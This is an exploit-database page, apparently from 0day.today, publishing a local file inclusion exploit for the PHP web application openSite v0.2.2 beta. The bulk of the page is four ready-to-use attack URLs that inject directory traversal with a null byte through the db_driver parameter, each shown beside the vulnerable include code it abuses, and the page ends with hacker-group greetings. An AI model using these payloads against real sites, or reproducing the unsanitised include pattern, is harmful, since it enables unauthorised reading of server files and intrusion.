[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

openSite v0.2.2 beta Local File Inclusion Vulnerbility

Author
n0n0x
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-15285
Category
web applications
Date add
08-01-2011
Platform
php
#######################################################
#opensite-v0.2.2-beta <=== Local File Include vuln
#######################################################
#By n0n0x
#Homepage: http://priasantai.uni.cc/
#Download script :http://sourceforge.net/projects/contentone/files/openSite/opensite-v0.2.2-beta/opensite-v0.2.2-beta.zip/download
#######################################################
=========================================
xpl :
http://site.com/os/upload/src/include.php?db_driver=../../../../../../../../../../LFI%00
 
<?php
    session_start();
    header('Cache-control: private');
 
    include('variables.php');
    include('functions.php');
    include('drivers/'.$db_driver.'.php');
=========================================
xpl:
http://site.com/os/upload/src/secure.php?db_driver=../../../../../../../../../../LFI%00
 
<?php
    include('variables.php');
    include('functions.php');
    include('drivers/'.$db_driver.'.php');
=========================================
xpl:
http://site.com/os/upload/src/content.php?db_driver=../../../../../../../../../../LFI%00
 
<?php
    include('functions.php');
    include('drivers/'.$db_driver.'.php');
=========================================
xpl:
http://site.com/os/upload/src/authenticate.php?db_driver=../../../../../../../../../../LFI%00
 
<?php
    error_reporting('2037');
 
    $auth = false;
    $username = $_POST['username'];
    $password = $_POST['password'];
 
    if ( isset($username) & isset($password) ) {
 
        include('variables.php');
        include('functions.php');
        include('drivers/'.$db_driver.'.php');
=========================================
#######################################################
#Greetz: all member | manadocoding.org - sekuritiOnline.net
#
# friends: angky.tatoki, EA ngel, bL4Ck_3n91n3,  opa, x0r0n, team_elite, thama, s0ny,
#             devilbat, cr4wl3r, cyberl0g, lumut-, Anti_Hack, DskyMC, mr.c, doniskynet.
#
# chats : irc.auzs.net 6667-7000 #kesawan,#exploit-db
######################################################



#  0day.today [2024-12-24]  #